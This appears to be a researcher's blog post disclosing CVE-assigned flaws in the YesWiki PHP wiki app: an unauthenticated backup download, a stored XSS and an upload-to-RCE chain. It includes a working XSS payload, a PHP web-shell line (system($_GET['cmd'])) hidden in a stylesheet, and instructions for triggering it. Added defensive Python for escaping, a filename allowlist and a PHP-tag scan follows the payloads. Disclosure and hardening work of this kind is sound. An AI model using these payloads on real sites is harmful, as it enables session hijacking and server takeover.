
A Very Brief Look at YesWiki

After I created TemplateSearch.io, I was testing it out by searching for random things and came across several templates for YesWiki. I Googled it to see exactly what it is, because I'd never heard of it. It turns out to be a PHP wiki app built on Symfony. I decided to spend a few hours checking it out for security issues, with a main goal of RCE or bust and a secondary goal of chaining or scripting the exploits for impact. I didn't want to spend too much time on it, since I have eighty-five other things going on, so pardon the lack of technical details. But did I achieve my goals? Read on to find out.

Installation

Clone the repo, navigate to the docker folder, run docker build and then docker compose up. Simple as that. Then visit http://localhost:8085.

Unauthenticated Site Backup Creation and Download

One of the first things I found is that visiting certain URLs creates a site backup without authentication, and a second request downloads that backup. An unauthenticated attacker can therefore pull a full copy of the site's data without ever logging in. See here: GitHub.

Stored XSS

In the code, I saw that comments were largely sanitized, but there was a way to sneak some JavaScript past the filter, and because the comment is stored, every user who views the page gets hit by the XSS.

You can simply put your JS in a comment, wrapped in CSS comment delimiters:

/*<script>alert('pizzapower')</script>*/

The /* */ wrapper only means something to a CSS parser; the browser's HTML parser still sees a <script> element and executes it. See here: GitHub.
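As an added example that is not part of the original post or YesWiki's code, the Python below shows why the CSS comment wrapper changes nothing for the browser and gives a regression check for comment rendering: a hypothetical renderer that interpolates the comment verbatim is compared with one that HTML-encodes at the output boundary, and an HTML parser counts the elements each one produces. The render functions, the element counter and the sample inputs are constructed for this example; the first sample is the payload from the post.

```python
"""Added example (not YesWiki's code): CSS comment delimiters do not
neutralise a <script> element in an HTML context, and a regression check
that catches any markup leaking out of a rendered comment body."""
import html
from html.parser import HTMLParser

# Payload from the post, wrapped in CSS comment delimiters.
PAYLOAD = "/*<script>alert('pizzapower')</script>*/"

# Constructed samples for the regression check: the post's payload plus a
# few common variants a comment filter should also render inert.
SAMPLES = (
    PAYLOAD,
    "<script>alert(1)</script>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<img src=x onerror=alert(1)>",
    "plain text with /* a css comment */ in it",
)


class TagCounter(HTMLParser):
    """Counts start tags the way a browser-style parser sees them.

    HTMLParser knows nothing about /* */; like a browser it treats those
    characters as text and still recognises the <script> element."""

    def __init__(self):
        super().__init__()
        self.tags = 0

    def handle_starttag(self, tag, attrs):
        self.tags += 1


def count_tags(markup: str) -> int:
    """Number of elements in the markup (the wrapper div counts as one)."""
    counter = TagCounter()
    counter.feed(markup)
    counter.close()
    return counter.tags


def render_comment_unsafe(text: str) -> str:
    """Hypothetical vulnerable rendering: the body is interpolated verbatim."""
    return f'<div class="comment">{text}</div>'


def render_comment_escaped(text: str) -> str:
    """Hardened rendering: encode the body where it is written into HTML."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


def is_comment_rendering_safe(render, samples=SAMPLES) -> bool:
    """Regression check: the wrapper div must be the only element produced.

    Any second element means the comment body was able to inject markup,
    whether or not the injected text looked like a CSS comment."""
    return all(count_tags(render(sample)) == 1 for sample in samples)


if __name__ == "__main__":
    for name, render in (("unsafe", render_comment_unsafe),
                         ("escaped", render_comment_escaped)):
        print(name, count_tags(render(PAYLOAD)), "element(s) from the payload;",
              "safe" if is_comment_rendering_safe(render) else "UNSAFE")
```

Counting elements rather than searching for the string "script" is deliberate: a filter that looks for specific tag names is exactly the kind of check that wrappers and case changes slip past, while the parser reports what the browser will actually build.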

Arbitrary File Write to Remote Code Execution

On one page of the application, we can create new custom CSS stylings. When we save them, the filename extension is not restricted, so we get an arbitrary file write of any file type just by changing the extension. Change the extension to .php, put a PHP payload in the stylesheet body, and then navigate to the file in the browser for RCE: with the payload below, requesting the file with ?cmd=id runs id on the web server as the PHP process's user. See here: GitHub.

The CSS file ends up looking like this:

:root {
  --primary-color: <?php system($_GET['cmd']); ?>;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}
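As an added example, not YesWiki's code or its fix, here is a hardened save path for user-supplied stylesheets in Python, plus a scan an incident responder can run over a stylesheet directory to flag files carrying PHP open tags. The function names, the in-memory store and the sample stylesheets are constructed for this example; the poisoned stylesheet reuses the payload from the post.

```python
"""Added example (not YesWiki's code): allowlist the stylesheet name, refuse
PHP in the body, and scan existing stylesheets for PHP open tags."""
import posixpath
import re

# A bare name, 1-64 characters, no dots in the stem, ending in .css.
# Dots in the stem are rejected because Apache's mod_mime honours every
# extension in a name like theme.php.css.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.css$")

# PHP open tags: <?php, the echo tag <?=, and the short tag <? + whitespace.
# <?xml is deliberately not matched.
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=|\s)", re.IGNORECASE)

# Constructed samples: the post's payload inside a custom property, and a
# clean stylesheet.
POISONED_CSS = """:root {
  --primary-color: <?php system($_GET['cmd']); ?>;
  --secondary-color-1: #d8604c;
}
"""
CLEAN_CSS = ":root {\n  --primary-color: #d8604c;\n}\n"


def validate_stylesheet_name(name: str) -> bool:
    """Accept only a plain .css filename with no path components."""
    if name != posixpath.basename(name):      # rejects ../x.css and /etc/x.css
        return False
    if "\x00" in name or "\\" in name:         # NUL truncation, Windows separators
        return False
    return SAFE_NAME.fullmatch(name) is not None


def contains_php(content: str) -> bool:
    """True if the body contains anything the PHP interpreter would execute."""
    return PHP_OPEN_TAG.search(content) is not None


def save_stylesheet(name: str, content: str, store: dict) -> bool:
    """Hypothetical save hook: store the file only if name and body pass.

    `store` stands in for the directory the application writes into."""
    if not validate_stylesheet_name(name) or contains_php(content):
        return False
    store[name] = content
    return True


def find_php_in_stylesheets(files: dict) -> list:
    """IR helper: names of stylesheet files that contain a PHP open tag.

    `files` maps filename to content, as read from the stylesheet directory."""
    return sorted(name for name, body in files.items() if contains_php(body))


if __name__ == "__main__":
    store = {}
    print("shell.php accepted:", save_stylesheet("shell.php", POISONED_CSS, store))
    print("theme.css with PHP accepted:", save_stylesheet("theme.css", POISONED_CSS, store))
    print("theme.css clean accepted:", save_stylesheet("theme.css", CLEAN_CSS, store))
    print("flagged:", find_php_in_stylesheets({"a.css": CLEAN_CSS, "b.php": POISONED_CSS}))
```

Validating the name is necessary but not sufficient on its own: the web server should also refuse to execute PHP from the directory the stylesheets are written to (for example php_admin_flag engine off in the Apache directory block, or an nginx location that never passes that path to PHP-FPM), so that a future bypass of the name check still cannot reach system().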

Conclusion

Well, I did have plans for a more technical deep-dive on this, like what sanitization code I bypassed and why the backup creation URLs aren't protected, but I got busy. Anyway, the vulns described above were assigned CVE-2025-46346, CVE-2025-46347, and CVE-2025-46348. I barely scratched the surface of this app, so go check it out. It's a fun wiki app that could have some uses, if you're in the market for such a thing.

This post is licensed under CC BY 4.0 by the author.